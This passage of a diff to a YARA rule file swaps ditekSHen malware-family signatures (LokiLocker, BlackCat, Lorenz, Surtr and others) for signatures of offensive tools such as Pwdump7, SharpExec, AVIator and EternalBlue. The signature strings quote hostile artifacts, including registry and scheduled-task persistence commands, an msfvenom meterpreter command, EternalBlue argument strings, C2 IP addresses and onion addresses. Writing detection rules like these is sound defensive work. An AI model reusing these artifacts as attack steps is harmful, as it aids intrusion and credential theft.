+		$sys_x86 = { a0 00 00 00 24 02 00 00 40 00 00 00 [0-4] b8 00 00 00 6c 02 00 00 40 00 00 00 }
+		$sys_x64 = { 88 01 00 00 3c 04 00 00 40 00 00 00 [0-4] e8 02 00 00 f8 02 00 00 40 00 00 00 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 4 of ( $s* ) or ( all of ( $e* ) and 2 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and ( 2 of ( $* ) or 3 of ( $f* ) or all of ( $dll_* ) or any of ( $sys_* ) )
 }
-rule DITEKSHEN_MALWARE_Win_Lokilocker : FILE
+rule DITEKSHEN_INDICATOR_TOOL_SCN_Portscan : FILE
 {
 	meta:
-		description = "Detects LokiLocker ransomware"
+		description = "Detects a port scanner tool observed as second or third stage post-compromise or dropped by malware."
 		author = "ditekSHen"
-		id = "4f4927c5-79e6-5c5a-b84d-c4728affe9e1"
+		id = "f270e098-17a0-5d66-acd0-c946a29919f4"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9169-L9194"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L166-L180"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "bf78f5e8f40c1a19f6b078a85854e95d5ef1f321393a831edda17b0d65515da7"
+		logic_hash = "ebe5eb045a250ca38a55ac43018548074e9db160d76737c36f8ae5ea268b7b10"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
 
 	strings:
-		$x1 = "SOFTWARE\\Loki" fullword wide
-		$x2 = "Cpriv.Loki" fullword wide
-		$x3 = "Loki/" wide
-		$x4 = /loki(\s)?locker/ fullword wide nocase
-		$s1 = "Restore-My-Files.txt" wide
-		$s2 = "loading encryption keys" wide
-		$s3 = "Kill switch -> enabled" wide
-		$s4 = "ScanSMBShares" fullword ascii
-		$s5 = "RewriteMBR" fullword ascii
-		$s6 = /Encrypt(Drives|File|WinVolume|OsDrive)/ fullword ascii
-		$n1 = "unique-id=" ascii wide
-		$n2 = "&disk-size=" ascii wide
-		$n3 = "&user=Darwin&cpu-name=" ascii wide
-		$n4 = "&ram-size=" ascii wide
-		$n5 = "&os-name=" ascii wide
-		$n6 = "&chat-id=" ascii wide
-		$n7 = "&msg-id=" ascii wide
-		$n8 = "&elapsed-time=" ascii wide
+		$s1 = "HEAD / HTTP/1.0" fullword ascii
+		$s2 = "Result.txt" fullword ascii
+		$s3 = "Example: %s SYN " ascii
+		$s4 = "Performing Time: %d/%d/%d %d:%d:%d -->" fullword ascii
+		$s5 = "Bind On IP: %d.%d.%d.%d" fullword ascii
+		$s6 = "SYN Scan: About To Scan %" ascii
+		$s7 = "Normal Scan: About To Scan %" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 2 of ( $x* ) or 4 of ( $s* ) or 6 of ( $n* ) or ( 3 of ( $s* ) and 3 of ( $n* ) ) or ( 1 of ( $x* ) and ( 2 of ( $s* ) or 2 of ( $n* ) ) ) )
+		uint16( 0 ) == 0x5a4d and 5 of them
 }
-rule DITEKSHEN_MALWARE_Osx_Dazzlespy : FILE
+rule DITEKSHEN_INDICATOR_TOOL_MEM_Mxtract : FILE
 {
 	meta:
-		description = "Attemp at hunting for DazzleSpy"
+		description = "Detects mXtract, a linux-based tool that dumps memory for offensive pentration testing and can be used to scan memory for private keys, ips, and passwords using regexes."
 		author = "ditekSHen"
-		id = "8c5f6605-13d2-578e-9e0b-6a8226991ac5"
+		id = "e8c5e5b3-aa98-5f7f-9410-3efeef725f41"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9196-L9210"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L182-L195"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "61305384055f71d92ce2ac3d427a1b6f85ce21f502e759f3af952127b1413470"
+		logic_hash = "8271722c3b8f4458d20cf874d37e87e3b1fde701205ff54f0360fb87f717fc3f"
 		score = 50
-		quality = 71
+		quality = 69
 		tags = "FILE"
 
 	strings:
-		$x1 = "/osxrk_commandline/" ascii wide nocase
-		$x2 = "/Users/wangping/pangu/" ascii wide nocase
-		$s1 = "heartbeat" ascii wide
-		$s2 = "scanFiles" ascii wide
-		$s3 = "restartCMD" ascii wide
-		$s4 = "downloadFile" ascii wide
-		$s5 = "RDPInfo" ascii wide
+		$s1 = "_ZN18process_operations10get_rangesEv" fullword ascii
+		$s2 = "_ZN4misc10write_dumpESsSs" fullword ascii
+		$s3 = "_ZTVNSt8__detail13_Scanner_baseE" fullword ascii
+		$s4 = "Running as root is recommended as not all PIDs will be scanned" fullword ascii
+		$s5 = "ERROR ATTACHING TO PROCESS" fullword ascii
+		$s6 = "ERROR SCANNING MEMORY RANGE" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0xfacf and ( all of ( $x* ) or all of ( $s* ) or ( 1 of ( $x* ) and 3 of ( $s* ) ) )
+		( uint32( 0 ) == 0x464c457f or uint16( 0 ) == 0x457f ) and 3 of them
 }
-rule DITEKSHEN_MALWARE_Win_Bhunt : FILE
+rule DITEKSHEN_INDICATOR_TOOL_PWS_Sniffpass : FILE
 {
 	meta:
-		description = "Detects BHunt infostealer"
+		description = "Detects SniffPass, a password monitoring software that listens on the network and captures passwords over POP3, IMAP4, SMTP, FTP, and HTTP."
 		author = "ditekSHen"
-		id = "4c699f10-64a0-5e3c-af00-e08ebe1c6830"
+		id = "b96498d4-bbe3-5cb8-9c24-91ebb51e078a"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9212-L9233"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L197-L212"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "ca0a7e6898047fa3b369125a4402e2beffd328a5db47b1d5dd5914a86d6f0073"
+		logic_hash = "9b56ee4bac39b4220b24e92d00076650ffe84b71a60c0213a84fcf21c6cfe4cf"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$x1 = "BHUNT.Resources.resources" fullword ascii
-		$x2 = "//minecraftsquid.hopto.org/" wide
-		$s1 = "chaos_crew" ascii wide
-		$s2 = "golden7" ascii wide
-		$s3 = "mrpropper" ascii wide
-		$s4 = "/ifo.php?" ascii wide
-		$s5 = "bonanza=:=" ascii wide
-		$s6 = "blackjack=:=" ascii wide
-		$s7 = "SendPostData" fullword ascii
-		$c1 = "cmd /c REG ADD" wide
-		$c2 = "taskkill /F /IM" wide
-		$c3 = "cmd.exe /c wmic" wide
-		$g1 = "$ca9a291d-266c-41dc-9f1c-93cfe0dcac16" fullword ascii
-		$g2 = "$6d0feb35-213d-4b9f-afc7-06d168cfcb5e" fullword ascii
+		$s1 = "\\Release\\SniffPass.pdb" ascii
+		$s2 = "Password   Sniffer" fullword wide
+		$s3 = "Software\\NirSoft\\SniffPass" fullword ascii
+		$s4 = "Sniffed PasswordsCFailed to start" wide
+		$s5 = "Pwpcap.dll" fullword ascii
+		$s6 = "nmwifi.exe" fullword ascii
+		$s7 = "NmApi.dll" fullword ascii
+		$s8 = "npptools.dll" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $x* ) or ( 1 of ( $x* ) and ( 5 of ( $s* ) or 2 of ( $c* ) ) ) or ( 6 of ( $s* ) and 2 of ( $c* ) ) or ( all of ( $g* ) and 2 of them ) )
+		uint16( 0 ) == 0x5a4d and 4 of them
 }
-rule DITEKSHEN_MALWARE_Win_Lorenz : FILE
+rule DITEKSHEN_INDICATOR_TOOL_Avbypass_Aviator : FILE
 {
 	meta:
-		description = "Detects Lorenz ransomware"
+		description = "Detects AVIator, which is a backdoor generator utility, which uses cryptographic and injection techniques in order to bypass AV detection. This was observed to bypass Win.Trojan.AZorult. This rule works for binaries and memory."
 		author = "ditekSHen"
-		id = "9c11cfbc-aa77-5138-81e4-3a5f4f21a470"
+		id = "2bddd64e-baca-58cb-ba52-27487cc4ded5"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9235-L9265"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L214-L240"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e9fc9d405b955c379ae40b1804d43b19999f6ea264fc645c897080fb020e8ae8"
+		logic_hash = "1fb497eec2b0cd4051b5ddd53463f1da511c0a7b72d54a0bc68736a99fdc6143"
 		score = 75
-		quality = 48
+		quality = 50
 		tags = "FILE"
 
 	strings:
-		$x1 = "143.198.117.43" fullword ascii
-		$x2 = "157.90.147.28" fullword ascii
-		$x3 = "//kpb3ss3vwvfejd4g3gvpvqo6ad7nnmvcqoik4mxt2376yu2adlg5fwyd.onion" ascii
-		$x4 = "http://lorenz" ascii
-		$x5 = "\\lora\\Release\\lora.pdb" ascii
-		$x6 = "--MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQ" ascii
-		$x7 = "/USER:'HOMEOFFICE.COM\\" ascii
-		$x8 = "/USER:'Sentinel.com\\" ascii
-		$s1 = "to->_What == nullptr && to->_DoFree == false" fullword wide
-		$s2 = "*it == '\\0'" fullword wide
-		$s3 = "process call create 'cmd.exe /c" ascii
-		$s4 = "\\Control Panel\\Desktop\" /V Wallpaper /T REG_SZ /F /D" ascii
-		$s5 = "HELP_SECURITY_EVENT.html" ascii
-		$s6 = "<br>[+] Whats Happen?" ascii
-		$s7 = /\.Lorenz\.sz\d+$/ fullword ascii
-		$s8 = "TW9Vc29Db3JlV29ya2VyLmV4ZQ==" fullword ascii
-		$s9 = ".Speak(\"You've been hack" ascii nocase
-		$s10 = "data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAo" ascii
-		$n1 = "ame_serv=" ascii
-		$n2 = "&ip=" ascii
-		$n3 = "&winver=Windows" ascii
-		$n4 = "&list_drive=" ascii
-		$n5 = "&file=" ascii
+		$s1 = "msfvenom -p windows/meterpreter" ascii wide
+		$s2 = "payloadBox.Text" ascii wide
+		$s3 = "APCInjectionCheckBox" ascii wide
+		$s4 = "Thread Hijacking (Shellcode Arch: x86, OS Arch: x86)" ascii wide
+		$s5 = "injectExistingApp.Text" ascii wide
+		$s6 = "Stable execution but can be traced by most AVs" ascii wide
+		$s7 = "AV/\\tor" ascii wide
+		$s8 = "AvIator.Properties.Resources" ascii wide
+		$s9 = "Select injection technique" ascii wide
+		$s10 = "threadHijacking_option" ascii wide
+		$pwsh1 = "Convert.ToByte(Payload_Encrypted_Without_delimiterChar[" ascii wide
+		$pwsh2 = "[DllImport(\"kernel32.dll\", SetLastError = true)]" ascii wide
+		$pwsh3 = "IntPtr RtlAdjustPrivilege(" ascii wide
+		$pwsh4 = /InjectShellcode\.(THREADENTRY32|CONTEXT64|WriteProcessMemory\(|CloseHandle\(|CONTEXT_FLAGS|CONTEXT\(\);|Thread32Next\()/ ascii wide
+		$pwsh5 = "= Payload_Encrypted.Split(',');" ascii wide
+		$pwsh6 = "namespace NativePayload_Reverse_tcp" ascii wide
+		$pwsh7 = "byte[] Finall_Payload = Decrypt(KEY, _X_to_Bytes);" ascii wide
+		$pwsh8 = /ConstantsAndExtCalls\.(WriteProcessMemory\(|CreateRemoteThread\()/ ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 2 of ( $x* ) or 8 of ( $s* ) or ( 4 of ( $n* ) and 2 of them ) or ( 1 of ( $x* ) and 6 of them ) )
+		( uint16( 0 ) == 0x5a4d and ( 3 of ( $s* ) or 2 of ( $pwsh* ) ) ) or ( 3 of ( $s* ) or 2 of ( $pwsh* ) )
 }
-rule DITEKSHEN_MALWARE_Win_Blackcat : FILE
+rule DITEKSHEN_INDICATOR_TOOL_PWS_Pwdump7 : FILE
 {
 	meta:
-		description = "Detects BlackCat ransomware"
+		description = "Detects Pwdump7 password Dumper"
 		author = "ditekSHen"
-		id = "b6831d84-40d7-52ae-8c4d-30b087b0007b"
+		id = "dc6ff544-b9de-547b-9fa8-7d0b32e9592d"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9267-L9289"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L242-L254"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "cd76e5b87f33d91c17fd032417583c3f68d0e310aaf6f08e26ec5d53844ed9d2"
+		logic_hash = "f84ab69ecc6837a826dc8726785165b8135edf51a47fb5bbaf19dc589b3032bd"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
 
 	strings:
-		$x1 = "{\"config_id\":\"\",\"public_key\":\"MIIBIjANBgkqhkiG9w0BAQEFAAO" ascii
-		$x2 = "C:\\Users\\Public\\All Usersdeploy_note_and_image_for_all_users=" fullword ascii
-		$s1 = "encrypt_app::windows" ascii
-		$s2 = /locker::core::os::windows::(desktop_note|self_propagation|privilege_escalation|psexec|shadow_copy)/ ascii
-		$s3 = "uac_bypass::shell_exec=" ascii
-		$s4 = "-u-p-s-d-f-cpropagate::attempt=" ascii
-		$s5 = "masquerade_peb" ascii
-		$s6 = "RECOVER-${EXTENSION}-FILES.txt" ascii
-		$s7 = ".onion/?access-key=${ACCESS_KEY}" ascii
-		$s8 = "-vm-killno-vm-snapshot-killno-vm-kill-" ascii
-		$s9 = "esxi_vm_killenable_esxi_vm_snapshot_killstrict_" ascii
-		$s10 = /enum_(shares|servers)_sync::ok/ fullword ascii
-		$s11 = "hidden_partitions::mount_all::mounting=" ascii
+		$s1 = "savedump.dat" fullword ascii
+		$s2 = "Asd -_- _RegEnumKey fail!" fullword ascii
+		$s3 = "\\SAM\\" ascii
+		$s4 = "Unable to dump file %S" fullword ascii
+		$s5 = "NO PASSWORD" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d or uint16( 0 ) == 0x457f ) and ( all of ( $x* ) or 5 of ( $s* ) or ( 1 of ( $x* ) and 3 of ( $s* ) ) )
+		( uint16( 0 ) == 0x5a4d and 4 of them ) or ( all of them )
 }
-rule DITEKSHEN_MALWARE_Win_Timetime : FILE
+rule DITEKSHEN_INDICATOR_TOOL_LTM_Sharpexec : FILE
 {
 	meta:
-		description = "Detects TimeTime ransomware"
+		description = "Detects SharpExec lateral movement tool"
 		author = "ditekSHen"
-		id = "4d6a31b5-b5a5-58e2-bfce-c40c72cda391"
+		id = "4373a052-9525-5b24-81a4-65cd68afcb6c"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9311-L9327"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L256-L275"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c75ca595ff25f8c79bfe8e5c6af29349be8f07c2de79fd24f09b02afffb7168b"
+		logic_hash = "17ae5c9f0b22e8ecbbbcbe052e466d00cb7b62cff423688b5138209c52f0698d"
+		score = 75
+		quality = 73
+		tags = "FILE"
+
+	strings:
+		$s1 = "fileUploaded" fullword ascii
+		$s2 = "$7fbad126-e21c-4c4e-a9f0-613fcf585a71" fullword ascii
+		$s3 = "DESKTOP_HOOKCONTROL" fullword ascii
+		$s4 = /WINSTA_(ACCESSCLIPBOARD|WINSTA_ALL_ACCESS)/ fullword ascii
+		$s5 = /NETBIND(ADD|DISABLE|ENABLE|REMOVE)/ fullword ascii
+		$s6 = /SERVICE_(ALL_ACCESS|WIN32_OWN_PROCESS|INTERROGATE)/ fullword ascii
+		$s7 = /(Sharp|PS|smb)Exec/ fullword ascii
+		$s8 = "lpszPassword" fullword ascii
+		$s9 = "lpszDomain" fullword ascii
+		$s10 = "wmiexec" fullword ascii
+		$s11 = "\\C$\\__LegitFile" wide
+		$s12 = "LOGON32_LOGON_NEW_CREDENTIALS" fullword ascii
+
+	condition:
+		( uint16( 0 ) == 0x5a4d and 9 of them ) or ( all of them )
+}
+rule DITEKSHEN_INDICATOR_TOOL_PRV_Advancedrun : FILE
+{
+	meta:
+		description = "Detects NirSoft AdvancedRun privialge escalation tool"
+		author = "ditekSHen"
+		id = "c886951a-7ee9-5d38-a724-3dbba8c6ec31"
+		date = "2020-11-06"
+		modified = "2024-09-25"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L277-L289"
+		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
+		logic_hash = "3f39e8f0629647f44a2f473d7b49a8b6adb1acd62de36420b80e7820e63854bb"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$s1 = "@_DECRYPTOR_@" ascii wide
-		$s2 = "@__RECOVER_YOUR_FILES__@" wide
-		$s3 = "\\TimeTime.pdb" ascii
-		$s4 = "runCommand" fullword ascii
-		$s5 = "decryptor_file_name" fullword ascii
-		$s6 = "encryption_hiding_process" fullword ascii
-		$s7 = "admin_hiding_process" fullword ascii
-		$s8 = "security_vaccine" fullword ascii
-		$s9 = "EncrFiles_Load" fullword ascii
+		$s1 = "RunAsProcessName" fullword wide
+		$s2 = "Process ID/Name:" fullword wide
+		$s3 = "swinsta.dll" fullword wide
+		$s4 = "User of the selected process0Child of selected process (Using code injection) Specified user name and password" fullword wide
+		$s5 = "\"Current User - Allow UAC Elevation$Current User - Without UAC Elevation#Administrator (Force UAC Elevation)" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 4 of them
+		uint16( 0 ) == 0x5a4d and 3 of them
 }
-rule DITEKSHEN_MALWARE_Win_Strifewater : FILE
+rule DITEKSHEN_INDICATOR_TOOL_PWS_Amady : FILE
 {
 	meta:
-		description = "Detects StrifeWater RAT"
+		description = "Detects password stealer DLL. Dropped by Amadey"
 		author = "ditekSHen"
-		id = "69f0bd07-3e4e-5245-9c42-c3f8199b566e"
+		id = "6ee4e25b-bf38-5664-a08f-94e3fa92aa29"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9329-L9354"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L291-L306"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "ddb189dfe58af08d2c0682239551a5b9d82db94eedcefc02895316bcbbaca3f2"
+		logic_hash = "409374bec5f58abeb7741b41f0fc7ea1c3fdc7bbc3f0c0628db0e3aac82836d1"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
 
 	strings:
-		$s1 = "example/1.0" fullword wide
-		$s2 = "coname:" fullword ascii
-		$s3 = "*elev:" fullword ascii
-		$s4 = "*uname:" fullword ascii
-		$s5 = "--BoundrySign" ascii
-		$s6 = "000000c:\\users\\public\\libraries\\tmp.bi" ascii
-		$s7 = "9c4arSBr32g6IOni" fullword ascii
-		$pdb = "\\win8\\Desktop\\ishdar_win8\\" ascii
-		$xn1 = "techzenspace.com" fullword wide
-		$xn2 = "87.120.8.210" wide
-		$xn3 = "192.168.40.27" wide
-		$n1 = /RVP\/index\d+\.php/ fullword wide
-		$n2 = "tid=%d&code=%s&fname=%s&apiData=%s" fullword ascii
-		$n3 = "code=%s&tid=%d&fname=%s&apiData=%s" fullword ascii
-		$n4 = "Content-Disposition: form-data; name=\"token\"" fullword ascii
-		$n5 = "Content-Disposition: form-data; name=\"apiData\"" fullword ascii
-		$n6 = "Content-Disposition: form-data; name=\"data\"; filename=\"" fullword ascii
-		$n7 = "Content-Disposition: form-data; name=\"tid\"" fullword ascii
+		$s1 = "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\\AppData" fullword ascii
+		$s2 = "Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook" ascii
+		$s3 = "\\Mikrotik\\Winbox\\Addresses.cdb" fullword ascii
+		$s4 = "\\HostName" fullword ascii
+		$s5 = "\\Password" fullword ascii
+		$s6 = "SOFTWARE\\RealVNC\\" ascii
+		$s7 = "SOFTWARE\\TightVNC\\" ascii
+		$s8 = "cred.dll" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 2 of ( $xn* ) or 6 of ( $s* ) or 6 of ( $n* ) or ( 1 of ( $xn* ) and 4 of them ) or ( $pdb and 4 of them ) or ( 3 of ( $s* ) and 3 of ( $n* ) ) )
+		uint16( 0 ) == 0x5a4d and filesize < 400KB and 7 of them
 }
-rule DITEKSHEN_MALWARE_Win_Surtr : FILE
+rule DITEKSHEN_INDICATOR_TOOL_SCR_Amady : FILE
 {
 	meta:
-		description = "Detects Surtr ransomware. Ransom note is similar to LockFile"
+		description = "Detects screenshot stealer DLL. Dropped by Amadey"
 		author = "ditekSHen"
-		id = "7a31415d-5c03-5537-9adb-65e637f9fa0e"
+		id = "f7660899-ed12-5765-a856-6a1c7bbd8978"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9356-L9378"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L308-L320"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a8db5588079d471d8904f0444973973a0c01dbec1ccbe3d43a34d41a0dde495d"
+		logic_hash = "9e7ab39976e3219f0c6c3ce5341442343cc4baf30757cd1c9d0c2d3845fdda2f"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
 
 	strings:
-		$s1 = "<title>SurtrRansomware</title>" ascii
-		$s2 = "<HTA:APPLICATION ID=\"SurtrRansomware\"" ascii
-		$s3 = "APPLICATIONNAME=\"SurtrRansomware\"" ascii
-		$s4 = "src=\"data:image/jpeg; base64,/9j/4AAQSkZJRgABAQEAYABgAAD/2wCEAAgICAgJCAkKCgkNDgwODRMREBARExwUFhQWFBwrGx8bGx8bKyYuJSMlLiZENS8v" ascii
-		$s5 = "4rbgxisigb4pxnloxzc265rmzaj7fslrhyouegtrph2a7xhh55r6xaid.onion" ascii
-		$s6 = "schtasks /CREATE /SC ONLOGON /TN svchos" wide
-		$s7 = "reg add HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\ /v \"svchos" ascii
-		$s8 = "reg add HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\ /v \"svchos" ascii
-		$s9 = "SURTR_README.txt" wide
-		$s10 = "surtr-decrypt.top" ascii
-		$s11 = /(Public|Private|ID)_DATA\.surt/ wide
+		$s1 = "User-Agent: Uploador" fullword ascii
+		$s2 = "Content-Disposition: form-data; name=\"data\"; filename=\"" fullword ascii
+		$s3 = "WebUpload" fullword ascii
+		$s4 = "Cannot assign a %s to a %s%List does not allow duplicates ($0%x)%String" wide
+		$s5 = "scr.dll" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 4 of them
+		uint16( 0 ) == 0x5a4d and filesize < 700KB and 4 of them
 }
-rule DITEKSHEN_MALWARE_Win_Udprat : FILE
+rule DITEKSHEN_INDICATOR_TOOL_EXP_Eternalblue : FILE
 {
 	meta:
-		description = "Detects UDPRat"
+		description = "Detects Windows executables containing EternalBlue explitation artifacts"
 		author = "ditekSHen"
-		id = "938fc9fd-4f08-5c23-8583-06083d2efe59"
+		id = "08173a1e-2e32-5add-864a-d92ffa0a3e44"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9380-L9395"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L322-L342"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "4606b304d179148c6e44a0a8329675f2823f862a0944284cb646e5910659ea7c"
+		logic_hash = "63e56637118accb8c32c20e52465c027df2dbf83b3b663d316b453ce879572c8"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
 
 	strings:
-		$s1 = "\\code\\UDP\\Client\\" ascii
-		$s2 = "ssdp:discover" ascii
-		$s3 = ": Device:" ascii
-		$s4 = "for the SNMP U encountered" ascii
-		$s5 = "privat:InternetGatewayelink" fullword ascii
-		$s6 = "schemas A jet error was" ascii
-		$s7 = "msidentity" fullword ascii
-		$s8 = "microsoftonliser-based Securi" ascii
+		$ci1 = "CNEFileIO_" ascii wide
+		$ci2 = "coli_" ascii wide
+		$ci3 = "mainWrapper" ascii wide
+		$dp1 = "EXPLOIT_SHELLCODE" ascii wide
+		$dp2 = "ETERNALBLUE_VALIDATE_BACKDOOR" ascii wide
+		$dp3 = "ETERNALBLUE_DOUBLEPULSAR_PRESENT" ascii wide
+		$dp4 = "//service[name='smb']/port" ascii wide
+		$dp5 = /DOUBLEPULSAR_(PROTOCOL_|ARCHITECTURE_|FUNCTION_|DLL_|PROCESS_|COMMAND_|IS_64_BIT)/
+		$cm1 = "--DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll" ascii wide
+		$cm2 = "--DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll" ascii wide
+		$cm3 = "--DaveProxyPort=0 --NetworkTimeout 30 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 5 of them
+		uint16( 0 ) == 0x5a4d and ( 2 of ( $ci* ) ) or ( 2 of ( $dp* ) ) or ( 1 of ( $dp* ) and 1 of ( $ci* ) ) or ( 1 of ( $cm* ) )
 }
-rule DITEKSHEN_MALWARE_Win_Jesterstealer : FILE
+rule DITEKSHEN_INDICATOR_TOOL_EXP_Weblogic : FILE
 {
 	meta:
-		description = "Detects JesterStealer"
+		description = "Detects Windows executables containing Weblogic exploits commands"
 		author = "ditekSHen"
-		id = "7b07061f-97a4-5158-8084-46ccf212f6be"
+		id = "e761a968-35cb-5284-99f2-6d516ad348e3"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9397-L9417"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L344-L353"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c84df5d3ad2bc7a75a11c07995cc034c2a92b2f6f6f6943288add9c44c57bf6d"
+		logic_hash = "01855f1125b0ba87dd40f7d460440dbda2d75c8b484e842a2b2e20c089b4ab5e"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
 
 	strings:
-		$s1 = /\[(Credman|Networks|Screenshot|Vault)\]\s\{0\}/ fullword wide
-		$s3 = "encoding=\"base64\"" fullword wide
-		$s4 = "/json/list" fullword wide
-		$s5 = "/L1ghtM4n/TorProxy/" ascii wide
-		$s6 = "<EnumerateCredentials>" ascii
-		$s7 = "<EnumerateBrowsers>" ascii
-		$s8 = "<PerformSelfDestruct>" ascii
-		$s9 = "<get_GrabberCount>" ascii
-		$s10 = "AnalyzeData" fullword ascii
-		$s11 = "CheckCard" fullword ascii
